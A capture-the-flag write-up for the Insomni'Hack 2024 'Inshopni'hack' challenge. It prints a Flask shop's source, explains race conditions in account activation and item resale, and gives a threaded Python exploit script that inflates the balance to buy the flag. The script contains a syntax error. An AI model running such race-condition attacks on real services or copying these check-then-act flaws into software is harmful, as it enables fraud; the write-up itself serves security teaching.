Inshopni'hack
[Insomni'Hack Finals, 2024]
Challenge
This challenge was a flask based webapp using redis and redis_om as temporary database storage.
import os
import uuid
import hashlib
import secrets
import time
from flask_wtf.csrf import CSRFProtect
from redis_om import Field, Migrator, JsonModel
from flask import Flask, request, render_template, make_response, redirect, flash
from typing import Optional
class Ruser(JsonModel):
username: str=Field(index=True)
password: str
token: str=Field(index=True)
balance: int
isActivated: Optional[bool]
challenge: Optional[str]
class RpurchaseLog(JsonModel):
userId: str=Field(index=True)
itemId: int
price: int
description: str
class Ritem(JsonModel):
id: int=Field(index=True)
name: str
price: int
description: str
def initItem():
for i in [
{"id":1,"name": "Inso Flag", "price": 10, "description": "🏴☠️"},
{"id":2,"name": "Swiss Flag", "price": 100, "description": "🇨🇭"},
{"id":3,"name": "CTF Flag", "price": 1337, "description": os.environ.get("FLAG")}
]:
Ritem(**i).save()
class API:
@staticmethod
def login(username, password, token) -> str:
print("Register: " + str(token), flush=True)
if len(username) == 0:
return ""
rusers = Ruser.find(Ruser.username == username).all()
if len(rusers) == 0:
token = token or uuid.uuid4().hex
token = str(token).strip()
rusers = Ruser.find(Ruser.token == token).all()
if len(rusers) > 0:
return ""
newUser = Ruser(username=username,password=hashlib.sha1(password.encode('utf-8')).hexdigest(),token=token,balance=20).save()
try:
rusers = Ruser.find(Ruser.token == token).all()
except:
return ""
user = rusers[0]
newUser.challenge = secrets.token_hex(32)
newUser.isActivated = False
newUser.save()
Ruser.db().expire(newUser.key(),360)
return token
user = rusers[0]
if (user.password != hashlib.sha1(password.encode('utf-8')).hexdigest()):
return ""
return user.token
@staticmethod
def getUser(token: str) -> (bool, int, [RpurchaseLog]):
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, 0, None
rpurchases = RpurchaseLog.find(RpurchaseLog.userId == user.pk)
return True, user.balance, [i for i in rpurchases]
@staticmethod
def buy(token: str, itemId: int) -> (bool, str):
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, "No existing user"
try:
Ritems = Ritem.find(Ritem.id == itemId).all()
product=Ritems[0]
except:
return False, "No such item"
if (not user.isActivated):
return False, "User is not activated"
if product.price > user.balance:
return False, "Not enough $"
newLog = RpurchaseLog(userId=user.pk,itemId=product.id,price=product.price,description=product.description).save()
RpurchaseLog.db().expire(newLog.key(),360)
user.balance -= product.price
user.save()
return True, ""
@staticmethod
def sell(token: str, purchaseId: int) -> (bool, str):
try:
rpurchasesLogs = RpurchaseLog.find(RpurchaseLog.pk == purchaseId).all()
purchaseLog = rpurchasesLogs[0]
except:
return False, "No such purchase"
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, "No existing user"
if purchaseLog.userId != user.pk:
return False, "Not your purchase."
RpurchaseLog.delete(purchaseLog.pk)
user.balance += purchaseLog.price
user.save()
return True, ""
@staticmethod
def activate(token: str, challenge: str) -> (bool, str):
print("Activation: " + str(token), flush=True)
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, "No existing user"
if user.isActivated == True:
return False, "User is already activated"
if user.challenge != challenge:
return False, "Wrong challenge submitted"
user.isActivated = True
user.save()
return True, ""
app = Flask(__name__,static_folder='static')
app.secret_key = b'dev'
csrf = CSRFProtect(app)
try:
Ritem.find(Ritem.id == 1).all()
except:
initItem()
pass
Migrator().run()
@app.route('/', methods=["GET", "POST"])
def default():
if request.method == 'POST':
token = API.login(request.form["username"], request.form["password"], request.authorization)
if token:
resp = make_response(redirect("/"))
resp.set_cookie("auth", token)
return resp
else:
return render_template('login.html',err_message="Wrong credential")
pass
else:
token = request.cookies.get("auth")
if token and len(token) > 31:
is_login, balance, purchaseLog = API.getUser(token)
if not is_login:
resp = make_response(redirect("/"))
resp.set_cookie("auth", "")
return resp
return render_template('home.html', balance=balance, purchaseLog=purchaseLog)
return render_template('login.html')
@app.route('/buy/<itemId>', methods=["POST"])
def buy(itemId):
token = request.cookies["auth"]
is_success, err_message = API.buy(token, int(itemId))
is_login, balance, purchaseLog = API.getUser(token)
if not is_success:
flash(err_message)
return make_response(redirect("/"))
@app.route('/sell/<purchaseId>', methods=["POST"])
def sell(purchaseId):
token = request.cookies["auth"]
is_success, err_message = API.sell(token, purchaseId)
if not is_success:
flash(err_message)
return make_response(redirect("/"))
@app.route('/activate/', methods=["POST"])
@csrf.exempt
def activate():
token = request.cookies["auth"]
data = request.get_json()
is_success, err_message = API.activate(token, data['challenge'])
if not is_success:
return render_template('login.html',err_message=err_message)
return make_response(redirect("/"))
Exploit
To get the flag we need to buy the item CTL Flag
, priced with 1337
coins.
The buy function can only be used when the account is activated.
However, when registering we only have 20
coins and our account is deactiaved.
So we need to somehow activate our account and increase our balance to at least 1337
coins.
Account Activation
We can activate our account with the activate
function.
We therefore need a token (which we can specify while registering) and a challenge value:
def activate(token: str, challenge: str) -> (bool, str):
print("Activation: " + str(token), flush=True)
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, "No existing user"
if user.isActivated == True:
return False, "User is already activated"
if user.challenge != challenge:
return False, "Wrong challenge submitted"
user.isActivated = True
user.save()
return True, ""
However, this requires us to know the challenge
value of the user, who was randomly generated when creating the account.
def login(username, password, token) -> str:
print("Register: " + str(token), flush=True)
if len(username) == 0:
return ""
rusers = Ruser.find(Ruser.username == username).all()
if len(rusers) == 0:
token = token or uuid.uuid4().hex
token = str(token).strip()
rusers = Ruser.find(Ruser.token == token).all()
if len(rusers) > 0:
return ""
newUser = Ruser(username=username,password=hashlib.sha1(password.encode('utf-8')).hexdigest(),token=token,balance=20).save()
try:
rusers = Ruser.find(Ruser.token == token).all()
except:
return ""
user = rusers[0]
newUser.challenge = secrets.token_hex(32)
newUser.isActivated = False
newUser.save()
Ruser.db().expire(newUser.key(),360)
return token
user = rusers[0]
if (user.password != hashlib.sha1(password.encode('utf-8')).hexdigest()):
return ""
return user.token
This is a bit odd, as the user is created first and afterwards the challenge and activation value is set. This allows us, to exploit this functionality through a race condition:
newUser = Ruser(username=username,password=hashlib.sha1(password.encode('utf-8')).hexdigest(),token=token,balance=20).save()
try:
rusers = Ruser.find(Ruser.token == token).all()
except:
return ""
user = rusers[0]
newUser.challenge = secrets.token_hex(32)
newUser.isActivated = False
newUser.save()
def activate(token: str, challenge: str) -> (bool, str):
print("Activation: " + str(token), flush=True)
try:
rusers = Ruser.find(Ruser.token == token).all()
# Race Condition: newUser.save() needs to be called in the other request somewhen between now and ...
user = rusers[0]
except:
return False, "No existing user"
if user.isActivated == True:
return False, "User is already activated"
if user.challenge != challenge:
return False, "Wrong challenge submitted"
user.isActivated = True
# Race Condition: ... now
user.save()
return True, ""
Hitting this race condition allows us, that we have stored the old challenge
value in rusers
.
This time-frame is very small.
Exploiting sell function to increase balance
Let's have a closer look at the sell function:
def sell(token: str, purchaseId: int) -> (bool, str):
try:
rpurchasesLogs = RpurchaseLog.find(RpurchaseLog.pk == purchaseId).all()
purchaseLog = rpurchasesLogs[0]
except:
return False, "No such purchase"
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, "No existing user"
if purchaseLog.userId != user.pk:
return False, "Not your purchase."
RpurchaseLog.delete(purchaseLog.pk)
user.balance += purchaseLog.price
user.save()
return True, ""
We have a similar situation as above.
- First the purchaseLog is fetched from the database
- Then we search for the user token
- Then we delete the PurchaseLog from the database
- Then we increase the balance
Here we can also exploit a race condition:
def sell(token: str, purchaseId: int) -> (bool, str):
try:
rpurchasesLogs = RpurchaseLog.find(RpurchaseLog.pk == purchaseId).all()
# Race Condition: sell function needs to be called in another request somewhen between now and ...
purchaseLog = rpurchasesLogs[0]
except:
return False, "No such purchase"
try:
rusers = Ruser.find(Ruser.token == token).all()
user = rusers[0]
except:
return False, "No existing user"
if purchaseLog.userId != user.pk:
return False, "Not your purchase."
# ... now
RpurchaseLog.delete(purchaseLog.pk)
user.balance += purchaseLog.price
user.save()
return True, ""
This allows us to run the function twice and increase our balance twice.
Exploit Script
import requests
import secrets
import base64
import re
import threading
import time
import json
# HOST = "http://localhost:1002/"
HOST = "https://inshopnihack.insomnihack.ch/"
def user():
username = secrets.token_hex(8)
password = secrets.token_hex(8)
token = "Bearer " + secrets.token_hex(32)
print(f"u:{username},pw:{password},tk:{token}")
return username, password, token
def activate(token, challenge = None):
res = requests.post(HOST + "/activate/", json={
"challenge": challenge
}, cookies={
"auth": token
})
r = res.content.decode()
m = re.findall("alert alert-warning\">\n(.*)\n", r)
if len(m) == 0:
print("[+] User w/token " + token + " Activated")
return True
else:
print("[+] " + m[0].strip())
return False
sessions = {}
def createUser(username, password, token):
print("[+] Creating user " + username)
sess = requests.session()
sessions[username] = sess
res = sess.get(HOST + "/")
data = res.content.decode()
csrf_token = re.findall('csrf_token" value="(.*)"', data)[0]
res = sess.post(HOST + "/", data={
"username": username,
"password": password,
"csrf_token": csrf_token
}, headers={
"Authorization": token
})
m = re.findall("alert alert-warning\">\n(.*)\n", res.content.decode())
if len(m) == 0:
print("[+] Done creating user")
else:
print("[+] " + m[0].strip())
return sess
username, password, token = user()
def hammerActivation(token):
for _ in range(5):
activate(token)
def get_csrf_token(sess):
res = sess.get(HOST)
print(res.content.decode())
def buy(sess, csrf_token, item):
res = sess.post(HOST + f"/buy/{item}", data={
"csrf_token": csrf_token
})
if res.status_code != 200:
print(res.content.decode())
return res.content.decode()
def sell(sess, csrf_token, item):
res = sess.post(HOST + f"/sell/{item}", data={
"csrf_token": csrf_token
})
if res.status_code != 200:
print(res.content.decode())
return res.content.decode()
def get_product_csrf_token_buy(sess, product):
res = sess.get(HOST)
m = re.findall(f'action="\/buy\/{product}.*\n.*csrf_token" value="(.*)"', res.content.decode())
if len(m) > 0:
return m[0]
return None
def get_sell_product(sess):
res = sess.get(HOST)
m = re.findall(f'action="\/sell\/(.*?)".*\n.*csrf_token" value="(.*)"', res.content.decode())
if len(m) > 0:
return m
return None
def get_amount(sess):
res = sess.get(HOST)
m = re.findall("You have (.*) bucks", res.content.decode())
if len(m) > 0:
print("[+] Amount: " + m[0])
return int(m[0])
return None
username, password, token = user()
is_activated = False
while not is_activated:
username, password, token = user()
ts = [threading.Thread(target=hammerActivation, args=[token]) for _ in range(5)]
for t in ts:
t.start()
sess = createUser(username, password, token)
for t in ts:
t.join()
buy(sess, get_product_csrf_token_buy(sess, 1), 1)
is_activated = get_amount(sess) < 20
print("[*] Is Activated")
with open('cookie.txt', 'w') as f:
json.dump(requests.utils.dict_from_cookiejar(sess.cookies), f)
sess = requests.session()
with open('cookie.txt', 'r') as f:
cookies = requests.utils.cookiejar_from_dict(json.load(f))
sess.cookies.update(cookies)
while True:
get_amount(sess)
print("[*] Buying")
while True:
amount = get_amount(sess)
product = 1 if amount < 200 else 2
if (amount == 0 and product == 1) or (amount < 100 and product = 2):
break
buy(sess, get_product_csrf_token_buy(sess, product), product)
tds = []
for el in get_sell_product(sess):
if not el:
continue
sellId = el[0]
csrf = el[1]
for i in range(20):
tds.append(threading.Thread(target=sell, args=[sess, csrf, sellId]))
for td in tds:
td.start()
for td in tds:
td.join()
get_amount(sess)
Some notes:
- In order to retrieve the flag use the
cookie.txt
file and set the cookie manual in the browser - Then you can buy the
CTF Flag
item